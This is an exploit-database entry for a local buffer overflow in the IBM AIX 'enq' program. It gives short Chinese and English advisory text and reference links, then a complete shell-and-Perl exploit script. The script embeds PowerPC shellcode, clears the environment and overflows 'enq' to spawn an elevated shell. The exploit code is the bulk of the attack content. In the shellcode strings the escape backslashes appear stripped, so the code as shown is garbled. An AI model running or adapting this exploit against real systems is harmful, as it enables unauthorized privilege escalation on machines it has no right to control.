https://www.exploit-db.com/exploits/20454
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200101-010

AIX是一款由IBM公司开发和维护的UNIX操作系统。AIX包含的enq对命令行参数解析不正确，本地攻击者可以利用这个漏洞以ROOT权限在系统上执行任意指令。enq程序对用户提交的’-M’参数缺少正确的边界缓冲区检查，攻击者提交超长字符串作为此参数值，可覆盖堆栈部分变量而发生缓冲区溢出，精心构建提交的数据可以以ROOT权限在系统上执行任意指令。

source: http://www.securityfocus.com/bid/2034/info

AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists that may allow elevation of user priviledges.

The problem occurs in the enq program. It is reported that an overflow exists in the command line argument parsing, which could lead to the overwriting of variables on the stack. This creates the potential for a malicious user to execute arbitrary code, and possibly gain administrative access. 

#!/bin/sh
# FileName: ex_enq_aix4x.sh
# Exploit "enq & qstatus" of Aix4.x to get egid=9 shell.
# Usage   : chmod ex_enq_aix4x.sh ; ./ex_enq_aix4x.sh
# Tested  : on Aix4.3.3
# Author  : [email protected]
# Site    : www.xfocus.org   www.xfocus.net
# Date    : 2003-4-24
# Announce: use as your owner risk!

PERL=/usr/bin/perl
TMP=/tmp/.env.tmp
SHPL=/tmp/.sh.pl
cat >$SHPL<<EOF
#!/usr/bin/perl
$BUFF="";

$BUFF.="x7cxa5x2ax79"x500;

$OSLEVEL=`/usr/bin/oslevel`;
$ID="x04";
if( $OSLEVEL=~/4.1/ ) {
  $ID="x03";
} elsif($OSLEVEL=~/4.3.3/) {
  $ID="x03";
} elsif( $OSLEVEL=~/4.2/ ) {
  $ID="x02";
}


$BUFF.="x7cxa5x2ax79x40x82xffxfdx7fxe8x02xa6";
$BUFF.="x3bxffx01x20x38x7fxffx08x38x9fxffx10";
$BUFF.="x90x7fxffx10x90xbfxffx14x88x5fxffx0f";
$BUFF.="x98xbfxffx0fx4cxc6x33x42x44xffxffx02";
$BUFF.="/bin/sh";



$BUFF.=$ID;

print $BUFF;
EOF

env | awk -F = '{print "unset "$1;}'|grep -v LOGNAME > $TMP
. $TMP
/bin/rm -f $TMP

CC=A`$PERL $SHPL` ; export CC
/bin/rm -f $SHPL
/usr/bin/enq -w"`perl -e 'print "x2fxf2x2bx10"x600'`"   

#EOF

来源:BID
名称:2034
链接:http://www.securityfocus.com/bid/2034
来源:BUGTRAQ
名称:20001201FixedlocalAIXV43vulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=97569466809056&w;=2
来源:XF
名称:aix-enq-bo(5619)
链接:http://xforce.iss.net/xforce/xfdb/5619
来源:AIXAPAR
名称:IY08287
链接:http://www-1.ibm.com/support/search.wss?rs=0&q;=IY08287&apar;=only
来源:AIXAPAR
名称:IY08143
链接:http://www-1.ibm.com/support/search.wss?rs=0&q;=IY08143&apar;=only